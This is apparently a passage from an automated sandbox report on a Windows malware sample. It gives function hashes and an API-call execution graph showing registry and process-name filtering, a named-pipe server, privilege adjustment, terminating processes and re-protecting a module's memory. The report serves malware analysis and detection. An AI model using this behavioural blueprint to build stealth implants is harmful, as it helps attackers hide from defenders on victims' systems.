                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: b1514153aef62ca315ed7c40c8fc0d0d2239417e2ca0f8381ec919346d2afa2f
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 65719136288B8193EB749E26995C3FE6BB4F3A5B84F440016FD4D53B89DE39C688C714
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 1a602a6d344b00db337fad62cf6e5bc019b19ce986088ee0326cdceecaeaa0a8
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: CF51B232B59A008ADB54CF15E448BAD33B1E785B98F168525FA4E477C8FF79C889C720
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 8d0505b4dd3317048630cab63e0b2482c825ef40fa27bf42a40dc112efe1ce15
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: C2615532508BC482EB619F15E4447DEB7A0F786B98F054215EB9C07BD9EF78D198CB20
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: f6f2cbe89f01e824d33c65e706b527ad846c276d9327b88527becae4b251b7fb
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: A251BF3628C781D3EB249E25A45C3FE6A71F3A4790F440025FD5D43B99DE3DC4888B64
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: c2c65543aca2a5b23b5bec896ba4387e000f3305eb369b243423ef63201ea7a7
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 51417A73A29A8086E7608F65E44D7DEA7B0F798784F844121FE4D87758EF38C489CB64
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 55087f132a780ca5cc734f7aed302346290cb2103b175ee940950c93b27a908a
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 01111932258B8082EB658F15F45929DB7E5F798B94F584620EE8D07B64DF3CC595CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: ee4418879fc30c60d4f3c1a372d8db391ed6796b32bac89319f5f30c42b3b839
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 59116D36A45B84C6EB14CF66A80D2AD77B0F788FD0F588124EE4E53765EF38D5868340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 77b61339011b6d9b604be459f17e792b4fb30993665c2871c1583d59a9d3f81d
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: D5E03232A41A049BF7288F62E80D38936E1EB88B05F488024CD0907360EFBD84DD8BA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 602b823c65a6f105dfc682687b74b8d00786c36ff7a8eb50206eb6a645ea7865
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 65E0E572651A04ABF7289F62E80D29D76B1FB88B15F888064CD0907320EE7884DD9A20

                                            Execution Graph

                                            Execution Coverage:2.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:7.2%
                                            Total number of Nodes:1782
                                            Total number of Limit Nodes:28
execution_graph (condensed)
The raw export is a flat token stream of node declarations (`<id> <address> [API names or IDA symbol annotations such as "13 API calls"]`) and `<id>-><id>` edges covering the 1782 nodes counted above. The edges between unnamed nodes are omitted here; each entry below lists the API calls reachable from one graph root (a node with no incoming edge), in call order, with the intermediate function addresses where the export names them. Two code images appear: one in the 0x20175eb0000 region and one at image base 0x140000000.

Roots in the 0x20175eb0000 image
• 20175eb5fcc: VirtualProtect, then GetLastError on the failure path.
• 20175eb5c8d: VirtualProtect.
• 20175eb1bc4 (polling loop): 20175eb1724 (GetProcessHeap/HeapAlloc buffers via 20175eb1264 and 20175eb1000) performs nine chained RegOpenKeyExW calls; after each one, 20175eb12b8 or 20175eb104c runs RegQueryInfoKeyW followed by a RegEnumValueW loop, copies value names (lstrlenW, GetProcessHeap, HeapAlloc, StrCpyW) and compares them against stored strings with StrCmpIW/StrCmpW (20175eb1530), then RegCloseKey; 20175eb19b0/20175eb14a0 free the buffers (HeapFree); a further StrCmpIW/StrCmpW (20175eb159c), Sleep, and the whole sequence repeats.
• 20175eb25dc: GetFileType, StrCpyW, GetFinalPathNameByHandleW (20175eb1ad4) with StrCmpNIW, lstrlenW, StrCpyW; 20175eb3708 builds a path with StrCmpIW, StrCpyW, StrCatW, PathCombineW; 20175eb3f88 StrCmpNIW; 20175eb1dd4 -> 20175eb1530 StrCmpIW/StrCmpW. The function resolves a file handle to its final path and compares that path against stored strings.
• 20175eb33a8 and 20175eb34b8: PdhGetCounterInfoW, then GetProcessHeap/HeapAlloc and a second PdhGetCounterInfoW into the buffer, StrCmpW, HeapFree; 20175eb3950 StrCmpNW, StrStrW, StrToIntW; 20175eb1a30 OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle; 20175eb3f88 StrCmpNIW; 20175eb1cfc -> 20175eb1530 StrCmpIW/StrCmpW. The function extracts a process ID from a PDH counter name, resolves it to the process's module file name and compares the base name against stored strings.
• 20175eb2ab4: TlsGetValue (three calls), StrCmpNIW (20175eb3f88), TlsSetValue (three calls).
• 20175ec19d0: C-runtime locale and code-page setup (helpers _invalid_parameter_noinfo, __std_exception_copy, Concurrency::details::SchedulerProxy::DeleteThis): FlsGetValue, EnterCriticalSection (20175ebc558), GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar (20175ebec58), GetStringTypeW, WideCharToMultiByte (20175ebece8), LCMapStringW (20175ebf2cd).
• 20175ec47c2: __CxxCallCatchBlock helpers, then 20175eb9aac resolves an API at run time: GetLastError, TlsGetValue, __vcrt_InitializeCriticalSectionEx, LoadLibraryExW (two call sites), GetLastError, FreeLibrary, GetProcAddress.
• 20175eb81c0: __scrt_acquire_startup_lock, 20175ebdf38 GetModuleFileNameW and GetLastError, 20175ebde1c WideCharToMultiByte with GetLastError (CRT start-up).
• 20175ec0fa8: 20175eb8070 (_invalid_parameter_noinfo) -> 20175eb8848 IsProcessorFeaturePresent, 20175eb891c RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, 20175eb8814 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess.
• 20175ebaaac and 20175ebb0d4: C++ exception dispatch (__except_validate_context_record, __CxxCallCatchBlock, __FrameHandler3::*, Is_bad_exception_allowed): RtlLookupFunctionEntry, RtlUnwindEx (20175eb9838), EncodePointer, RtlPcToFileHeader, RaiseException (20175eb9178).
• 20175ec06e0 (__std_exception_copy, _invalid_parameter_noinfo), 20175ebf6dc (20175ec1c0c DeleteCriticalSection), 20175ebc1d8 (SchedulerProxy::DeleteThis) and 20175eb2ed8 (20175eb38a8, 3 API calls): CRT helpers with no further named API.

Roots in the 0x140000000 image
• 140003728 (named-pipe server loop): 140002300 creates the pipe with an explicit DACL (AllocateAndInitializeSid, SetEntriesInAclW, LocalAlloc, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, CreateNamedPipeW) and the caller retries after Sleep; it then runs ConnectNamedPipe, ReadFile, 1400031c4 (31 API calls) to handle the request, WriteFile, DisconnectNamedPipe, and returns to ConnectNamedPipe; a failed ConnectNamedPipe leads to Sleep and DisconnectNamedPipe before the next accept.
19031 20175eb5da3 GetLastError 19030->19031 19032 20175eb5db1 19030->19032 19031->19032 16189 20175ec479d 16192 20175ebaf34 16189->16192 16193 20175ebaf4e 16192->16193 16195 20175ebaf9b 16192->16195 16194 20175eb9324 __CxxCallCatchBlock 9 API calls 16193->16194 16193->16195 16194->16195 15478 20175ebf6a0 15489 20175ebc558 EnterCriticalSection 15478->15489 15480 20175ebf6b0 15481 20175ec1c5c 39 API calls 15480->15481 15482 20175ebf6b9 15481->15482 15483 20175ebf6c7 15482->15483 15484 20175ebf498 41 API calls 15482->15484 15485 20175ebc5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15483->15485 15486 20175ebf6c2 15484->15486 15487 20175ebf6d3 15485->15487 15488 20175ebf598 GetStdHandle GetFileType 15486->15488 15488->15483 15490 140002d38 15493 140002d4c 15490->15493 15494 140002d5e OpenMutexW 15493->15494 15495 140002d84 CloseHandle 15494->15495 15496 140002d77 Sleep 15494->15496 15541 140002a0c 15495->15541 15496->15494 15499 140002a0c 14 API calls 15500 140002da5 GetCurrentProcessId OpenProcess 15499->15500 15501 140002dc3 OpenProcessToken 15500->15501 15502 140002e39 RegOpenKeyExW 15500->15502 15503 140002dd9 LookupPrivilegeValueW 15501->15503 15504 140002e30 CloseHandle 15501->15504 15505 140002d41 ExitProcess 15502->15505 15506 140002e6a RegQueryValueExW 15502->15506 15503->15504 15507 140002df0 AdjustTokenPrivileges 15503->15507 15504->15502 15506->15505 15508 140002e9a RegQueryValueExW 15506->15508 15507->15504 15509 140002e2a GetLastError 15507->15509 15508->15505 15510 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15508->15510 15509->15504 15510->15505 15511 140002f3c RegQueryValueExW 15510->15511 15511->15505 15512 140002f6c RegCloseKey GetCurrentProcessId 15511->15512 15555 14000200c GetProcessHeap HeapAlloc 15512->15555 15514 140002f83 RegCreateKeyExW 15515 14000307d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 15514->15515 15516 140002fc0 
ConvertStringSecurityDescriptorToSecurityDescriptorW 15514->15516 15519 14000151c 50 API calls 15515->15519 15517 140003002 RegCreateKeyExW 15516->15517 15518 140002fe8 RegSetKeySecurity LocalFree 15516->15518 15520 140003073 RegCloseKey 15517->15520 15521 14000303c GetCurrentProcessId RegSetValueExW RegCloseKey 15517->15521 15518->15517 15522 140003107 15519->15522 15520->15515 15521->15520 15523 140003113 ShellExecuteW 15522->15523 15524 140003145 15522->15524 15523->15523 15523->15524 15525 14000148c 6 API calls 15524->15525 15526 14000314d 15525->15526 15527 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15526->15527 15528 140003156 15527->15528 15529 14000148c 6 API calls 15528->15529 15530 14000315f 15529->15530 15531 14000148c 6 API calls 15530->15531 15532 140003168 15531->15532 15533 14000148c 6 API calls 15532->15533 15534 140003171 15533->15534 15535 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15534->15535 15536 14000317a 15535->15536 15537 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15536->15537 15538 140003183 15537->15538 15539 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15538->15539 15540 14000318c GetProcessHeap HeapFree SleepEx 15539->15540 15540->15505 15542 140002a15 StrCpyW StrCatW GetModuleHandleW 15541->15542 15543 140002bdf 15541->15543 15542->15543 15544 140002a66 GetCurrentProcess K32GetModuleInformation 15542->15544 15543->15499 15545 140002bd6 FreeLibrary 15544->15545 15546 140002a96 CreateFileW 15544->15546 15545->15543 15546->15545 15547 140002acb CreateFileMappingW 15546->15547 15548 140002af4 MapViewOfFile 15547->15548 15549 140002bcd CloseHandle 15547->15549 15550 140002bc4 CloseHandle 15548->15550 15551 140002b17 15548->15551 15549->15545 15550->15549 15551->15550 15552 140002b30 lstrcmpiA 15551->15552 15554 140002b6e 15551->15554 15552->15551 15553 140002b70 VirtualProtect VirtualProtect 15552->15553 15553->15550 15554->15550 15561 140001cf0 GetProcessHeap HeapAlloc 
GetProcessHeap HeapAlloc K32EnumProcesses 15555->15561 15557 1400020a5 GetProcessHeap HeapFree 15558 140002050 15558->15557 15559 140002071 OpenProcess 15558->15559 15559->15558 15560 140002087 TerminateProcess CloseHandle 15559->15560 15560->15558 15562 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 15561->15562 15566 140001d7d 15561->15566 15562->15558 15563 140001d92 OpenProcess 15564 140001daf K32EnumProcessModulesEx 15563->15564 15563->15566 15565 140001e43 CloseHandle 15564->15565 15564->15566 15565->15566 15566->15562 15566->15563 15566->15565 15567 140001de9 ReadProcessMemory 15566->15567 15568 140001e0b 15567->15568 15568->15565 15568->15566 15568->15567 16388 20175ec1398 16389 20175ec13ae 16388->16389 16390 20175ec13f5 16389->16390 16391 20175ec140e 16389->16391 16397 20175ebd1f4 16390->16397 16396 20175ec1405 16391->16396 16403 20175ebdd78 16391->16403 16411 20175ebcb10 16397->16411 16400 20175ebd04c 16479 20175ebcef8 16400->16479 16404 20175ebdd9c 16403->16404 16410 20175ebdd97 16403->16410 16405 20175ebcab0 _invalid_parameter_noinfo 14 API calls 16404->16405 16404->16410 16406 20175ebddb7 16405->16406 16565 20175ebffb4 16406->16565 16410->16396 16412 20175ebcb59 GetLastError 16411->16412 16414 20175ebcb2f __std_exception_copy 16411->16414 16413 20175ebcb6c 16412->16413 16415 20175ebcb8a SetLastError 16413->16415 16417 20175ebcb87 16413->16417 16419 20175ebc940 _invalid_parameter_noinfo 11 API calls 16413->16419 16416 20175ebcb54 16414->16416 16420 20175ebc940 GetLastError 16414->16420 16415->16416 16416->16400 16417->16415 16419->16417 16421 20175ebc966 16420->16421 16422 20175ebc96c SetLastError 16421->16422 16438 20175ebd220 16421->16438 16424 20175ebc9e5 16422->16424 16424->16416 16426 20175ebc9a5 FlsSetValue 16429 20175ebc9c8 16426->16429 16430 20175ebc9b1 FlsSetValue 16426->16430 16427 20175ebc995 FlsSetValue 16445 20175ebd2a0 16427->16445 16451 20175ebc758 16429->16451 16432 20175ebd2a0 
Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 16430->16432 16437 20175ebc9c6 SetLastError 16432->16437 16437->16424 16439 20175ebd231 _invalid_parameter_noinfo 16438->16439 16440 20175ebd282 16439->16440 16441 20175ebd266 HeapAlloc 16439->16441 16456 20175ebb470 16439->16456 16443 20175ebd1f4 __std_exception_copy 12 API calls 16440->16443 16441->16439 16442 20175ebc987 16441->16442 16442->16426 16442->16427 16443->16442 16446 20175ebc9a3 16445->16446 16447 20175ebd2a5 HeapFree 16445->16447 16446->16422 16447->16446 16448 20175ebd2c0 GetLastError 16447->16448 16449 20175ebd2cd Concurrency::details::SchedulerProxy::DeleteThis 16448->16449 16450 20175ebd1f4 __std_exception_copy 11 API calls 16449->16450 16450->16446 16465 20175ebc630 16451->16465 16459 20175ebb4c0 16456->16459 16464 20175ebc558 EnterCriticalSection 16459->16464 16477 20175ebc558 EnterCriticalSection 16465->16477 16480 20175ebcf23 16479->16480 16487 20175ebcf94 16480->16487 16482 20175ebcf4a 16483 20175ebcf6d 16482->16483 16497 20175ebc3e0 16482->16497 16485 20175ebcf82 16483->16485 16486 20175ebc3e0 _invalid_parameter_noinfo 17 API calls 16483->16486 16485->16396 16486->16485 16510 20175ebccc8 16487->16510 16493 20175ebcfcf 16493->16482 16498 20175ebc3ef GetLastError 16497->16498 16499 20175ebc438 16497->16499 16500 20175ebc404 16498->16500 16499->16483 16501 20175ebcba0 _invalid_parameter_noinfo 14 API calls 16500->16501 16502 20175ebc41e SetLastError 16501->16502 16502->16499 16503 20175ebc441 16502->16503 16504 20175ebc3e0 _invalid_parameter_noinfo 15 API calls 16503->16504 16505 20175ebc467 16504->16505 16536 20175ebffe8 16505->16536 16511 20175ebcd1f 16510->16511 16512 20175ebcce4 GetLastError 16510->16512 16511->16493 16516 20175ebcd34 16511->16516 16513 20175ebccf4 16512->16513 16523 20175ebcba0 16513->16523 16517 20175ebcd50 GetLastError SetLastError 16516->16517 16518 20175ebcd68 16516->16518 16517->16518 16518->16493 16519 20175ebd06c IsProcessorFeaturePresent 16518->16519 
16520 20175ebd07f 16519->16520 16528 20175ebcd80 16520->16528 16524 20175ebcbc8 FlsGetValue 16523->16524 16525 20175ebcbc4 16523->16525 16524->16525 16526 20175ebcbde SetLastError 16525->16526 16527 20175ebc940 _invalid_parameter_noinfo 13 API calls 16525->16527 16526->16511 16527->16526 16529 20175ebcdba _invalid_parameter_noinfo 16528->16529 16530 20175ebcde2 RtlCaptureContext RtlLookupFunctionEntry 16529->16530 16531 20175ebce2e RtlVirtualUnwind 16530->16531 16532 20175ebce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16530->16532 16531->16532 16535 20175ebceb6 _invalid_parameter_noinfo 16532->16535 16533 20175eb8070 _invalid_parameter_noinfo 8 API calls 16534 20175ebced5 GetCurrentProcess TerminateProcess 16533->16534 16535->16533 16537 20175ec0001 16536->16537 16539 20175ebc48f 16536->16539 16537->16539 16544 20175ec0a40 16537->16544 16540 20175ec0054 16539->16540 16541 20175ec006d 16540->16541 16542 20175ebc49f 16540->16542 16541->16542 16562 20175ebe8c4 16541->16562 16542->16483 16553 20175ebcab0 16544->16553 16546 20175ec0a4f 16552 20175ec0a95 16546->16552 16561 20175ebc558 EnterCriticalSection 16546->16561 16552->16539 16554 20175ebcb10 __std_exception_copy 13 API calls 16553->16554 16556 20175ebcab9 16554->16556 16555 20175ebcabe 16555->16546 16556->16555 16557 20175ebcae8 FlsGetValue 16556->16557 16558 20175ebcae4 16556->16558 16557->16558 16559 20175ebcafe 16558->16559 16560 20175ebc940 _invalid_parameter_noinfo 13 API calls 16558->16560 16559->16546 16560->16559 16563 20175ebcab0 _invalid_parameter_noinfo 14 API calls 16562->16563 16564 20175ebe8cd 16563->16564 16566 20175ebddda 16565->16566 16567 20175ebffc9 16565->16567 16569 20175ec0020 16566->16569 16567->16566 16568 20175ec0a40 _invalid_parameter_noinfo 14 API calls 16567->16568 16568->16566 16570 20175ec0048 16569->16570 16571 20175ec0035 16569->16571 16570->16410 16571->16570 16572 20175ebe8c4 _invalid_parameter_noinfo 14 API calls 16571->16572 16572->16570 16574 
20175ebf370 VirtualProtect 19059 20175ebf870 19060 20175ebf8a0 19059->19060 19062 20175ebf8c7 19059->19062 19061 20175ebcb10 __std_exception_copy 13 API calls 19060->19061 19060->19062 19066 20175ebf8b4 19060->19066 19061->19066 19063 20175ebf99c 19062->19063 19082 20175ebc558 EnterCriticalSection 19062->19082 19065 20175ebfa03 19063->19065 19067 20175ebf9ca 19063->19067 19068 20175ebfab3 19063->19068 19079 20175ebfa61 19065->19079 19083 20175ebc5ac LeaveCriticalSection 19065->19083 19066->19062 19069 20175ebf949 19066->19069 19077 20175ebf904 19066->19077 19067->19065 19076 20175ebcab0 _invalid_parameter_noinfo 14 API calls 19067->19076 19073 20175ebfac0 19068->19073 19084 20175ebc5ac LeaveCriticalSection 19068->19084 19070 20175ebd1f4 __std_exception_copy 13 API calls 19069->19070 19074 20175ebf94e 19070->19074 19075 20175ebd04c _invalid_parameter_noinfo 38 API calls 19074->19075 19075->19077 19078 20175ebf9f3 19076->19078 19080 20175ebcab0 _invalid_parameter_noinfo 14 API calls 19078->19080 19081 20175ebcab0 14 API calls _invalid_parameter_noinfo 19079->19081 19080->19065 19081->19079 18577 20175ebc180 18580 20175ebbf38 18577->18580 18587 20175ebbf00 18580->18587 18588 20175ebbf10 18587->18588 18589 20175ebbf15 18587->18589 18590 20175ebbebc 13 API calls 18588->18590 18591 20175ebbf1c 18589->18591 18590->18589 18592 20175ebbf2c 18591->18592 18593 20175ebbf31 18591->18593 18594 20175ebbebc 13 API calls 18592->18594 18595 20175ebbebc 18593->18595 18594->18593 18596 20175ebbef2 18595->18596 18597 20175ebbec1 18595->18597 18598 20175ebbeea 18597->18598 18599 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18597->18599 18600 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18598->18600 18599->18597 18600->18596 19112 20175ec387c 19113 20175ec38b4 __GSHandlerCheckCommon 19112->19113 19114 20175ec38e0 19113->19114 19116 20175eb9a24 19113->19116 19117 20175eb9324 __CxxCallCatchBlock 9 API calls 19116->19117 19118 
20175eb9a4e 19117->19118 19119 20175eb9324 __CxxCallCatchBlock 9 API calls 19118->19119 19120 20175eb9a5b 19119->19120 19121 20175eb9324 __CxxCallCatchBlock 9 API calls 19120->19121 19122 20175eb9a64 19121->19122 19122->19114 18601 20175eb5974 18602 20175eb597a 18601->18602 18613 20175eb7fa0 18602->18613 18606 20175eb59de 18608 20175eb5a77 18608->18606 18610 20175eb5bfd 18608->18610 18626 20175eb7b80 18608->18626 18609 20175eb5cfb 18610->18609 18611 20175eb5d77 VirtualProtect 18610->18611 18611->18606 18612 20175eb5da3 GetLastError 18611->18612 18612->18606 18614 20175eb7fab 18613->18614 18615 20175eb59bd 18614->18615 18616 20175ebb470 _invalid_parameter_noinfo 2 API calls 18614->18616 18617 20175eb7fca 18614->18617 18615->18606 18622 20175eb4400 18615->18622 18616->18614 18618 20175eb7fd5 18617->18618 18632 20175eb87b8 18617->18632 18636 20175eb87d8 18618->18636 18623 20175eb441d 18622->18623 18625 20175eb448c 18623->18625 18640 20175eb4670 18623->18640 18625->18608 18627 20175eb7bc7 18626->18627 18665 20175eb7950 18627->18665 18630 20175eb8070 _invalid_parameter_noinfo 8 API calls 18631 20175eb7bf1 18630->18631 18631->18608 18633 20175eb87c6 std::bad_alloc::bad_alloc 18632->18633 18634 20175eb9178 Concurrency::cancel_current_task 2 API calls 18633->18634 18635 20175eb87d7 18634->18635 18637 20175eb87e6 std::bad_alloc::bad_alloc 18636->18637 18638 20175eb9178 Concurrency::cancel_current_task 2 API calls 18637->18638 18639 20175eb7fdb 18638->18639 18641 20175eb46b7 18640->18641 18642 20175eb4694 18640->18642 18643 20175eb46ed 18641->18643 18660 20175eb4250 18641->18660 18642->18641 18654 20175eb4120 